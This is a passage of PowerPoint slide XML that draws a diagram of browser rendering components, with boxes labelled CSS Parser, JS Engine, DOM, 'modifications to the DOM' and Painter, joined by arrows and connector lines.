              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="546556" y="430886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08731657-E22B-484E-AFE8-E5C85850A790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427683" y="2565451"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="0" y="107721"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF64BB6B-EB98-A744-904B-F834556D6760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189683" y="2569467"/>
            <a:ext cx="1664970" cy="431165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26670" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Parser</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C9398C-604A-6847-94BC-F70320113FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710062" y="3965032"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="546556" y="430886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80189A3-153B-0749-8D88-AC0FC54854CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710062" y="3965032"/>
            <a:ext cx="762000" cy="431165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="431164">
                <a:moveTo>
                  <a:pt x="0" y="107721"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546556" y="107721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="215443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="430886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546556" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="323165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="107721"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB64C56-EE2C-7C48-A006-96C91B1EE4CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3472062" y="3969048"/>
            <a:ext cx="1508125" cy="431165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26670" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Engine</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EDF9BAB-F797-C04B-8125-04FCF182ADC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351390" y="1953098"/>
            <a:ext cx="2487809" cy="1297214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E0CA1E-2368-E74A-B56A-AF14E04DC82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346627" y="1948335"/>
            <a:ext cx="2497455" cy="1306830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="22225" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="21590" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD7705C-61DE-2449-81FA-0202ED2C8233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422305" y="1817703"/>
            <a:ext cx="831215" cy="499109"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="831214" h="499110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="831065" y="498500"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAB0EE58-2EFA-424E-8667-7180EBDB6B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6227660" y="2279695"/>
            <a:ext cx="109371" cy="90502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992B0341-A89F-F34A-8C74-B639C74B9717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4848821" y="2532478"/>
            <a:ext cx="1390650" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1390650" h="274319">
                <a:moveTo>
                  <a:pt x="0" y="273814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1390421" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2241BE54-7EF0-814D-8D0E-7DFC6F21223F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223639" y="2492081"/>
            <a:ext cx="109951" cy="80795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D13CF9-23C6-CB47-A45E-DA27D4C6E4E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979789" y="3331144"/>
            <a:ext cx="1277620" cy="879475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1277620" h="879475">
                <a:moveTo>
                  <a:pt x="0" y="879161"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1277443" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF58D14D-D83C-EA4E-951A-5935267F473E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229869" y="3272607"/>
            <a:ext cx="108103" cy="93981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00D45EF-81FD-8649-AA8A-F1B6E9E347DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5738614" y="3627698"/>
            <a:ext cx="1965960" cy="694055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="24765" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>modifications</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to  the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC49B213-123D-EC48-B8A7-9D99CA3E44E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8030230" y="3282906"/>
            <a:ext cx="431165" cy="1113155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="431165" h="1113154">
                <a:moveTo>
                  <a:pt x="323164" y="897570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="107720" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107720" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323164" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323164" y="897570"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="431165" h="1113154">
                <a:moveTo>
                  <a:pt x="215442" y="1113013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430886" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215442" y="1113013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BBE0E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57559D16-C944-F844-8BE1-827E7488FF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8030230" y="3282906"/>
            <a:ext cx="431165" cy="1113155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="431165" h="1113154">
                <a:moveTo>
                  <a:pt x="323164" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="323164" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430886" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215442" y="1113013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107720" y="897570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107720" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323164" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828665BF-3B93-B040-8223-787DFB5351DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696031" y="4395919"/>
            <a:ext cx="1099820" cy="431165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26670" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Painter</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B071F4F8-AF37-8C4F-B439-69CC03E1CDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229897" y="4839810"/>
            <a:ext cx="1270" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="419100">
                <a:moveTo>
                  <a:pt x="1092" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419001"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
